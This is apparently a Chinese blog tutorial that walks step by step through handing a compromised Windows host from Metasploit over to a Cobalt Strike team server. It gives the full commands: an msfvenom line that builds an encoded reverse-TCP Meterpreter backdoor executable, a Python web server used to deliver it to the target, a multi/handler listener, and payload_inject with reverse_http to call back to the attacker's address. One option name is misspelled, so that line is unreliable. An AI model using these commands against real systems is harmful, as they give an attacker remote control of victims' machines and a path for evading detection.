Cobalt Strike 注入msf会话

目录

(一)环境准备

1、启动服务端

2、启动客户端

3、一个在msf拿到权限的靶机

(二) 配置msf创建监听

1、使用msf创建后门

2、使用python创建一个web服务,然后使用靶机下载

3、配置监控并获得meterpreter

3.1、 启动msf

3.2 、 创建监控

3.3、加载payload

 3.4、配置监控参数

3.5、后台当前session

(三) 使用CS进行监控

1、加载msf的payload注入功能

2、设置payload的反弹方式

 3、查看参数

4、设置cs监听端口

5、设置控制会话

6、设置当前msf不接受监听数据

7、执行

8、进入CS监控器


(一)环境准备


1、启动服务端

kali操作系统

Cobalt Strike 注入msf会话_第1张图片

2、启动客户端

Cobalt Strike 注入msf会话_第2张图片

 

3、一个在msf拿到权限的靶机

        我这里是在虚拟机里面的windows10已经下载好msf的靶机。

(二) 配置msf创建监听


1、使用msf创建后门

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe

Cobalt Strike 注入msf会话_第3张图片

 

2、使用python创建一个web服务,然后使用靶机下载

python -m http.server

使用靶机下载恶意代码:

Cobalt Strike 注入msf会话_第4张图片

 

3、配置监控并获得meterpreter

3.1、 启动msf

msfconsole

Cobalt Strike 注入msf会话_第5张图片

 

3.2 、 创建监控

use exploit/multi/handler

Cobalt Strike 注入msf会话_第6张图片

 

3.3、加载payload

set payload windows/meterpreter/reverse_tcp

 

 3.4、配置监控参数

show options

set lhost 监控IP

set lport 监控端口

run 执行

在靶机执行后门程序中等待返回 meterpreter

3.5、后台当前session

background

 或者在命令行里面直接输入sessions,显示当前存在的session:

Cobalt Strike 注入msf会话_第7张图片

(三) 使用CS进行监控


1、加载msf的payload注入功能

use exploit/windows/local/payload_inject

 

2、设置payload的反弹方式

set payload windows/meterpreter/reverse_http

 

 3、查看参数

show options(图一)

set lhost 192.168.0.2(设置cs服务器的地址,图二)

Cobalt Strike 注入msf会话_第8张图片 图一

 

Cobalt Strike 注入msf会话_第9张图片 图二

 

4、设置cs监听端口

set lport 4567

5、设置控制会话

set session 1(看情况而定)

6、设置当前msf不接受监听数据

set disablepayloadhander true

7、执行

 

run

Cobalt Strike 注入msf会话_第10张图片

 

8、进入CS监控器

Cobalt Strike 注入msf会话_第11张图片

接下来就可以用cs进行实际操作!!!

你可能感兴趣的:(信息安全工具,网络,网络安全,windows,安全)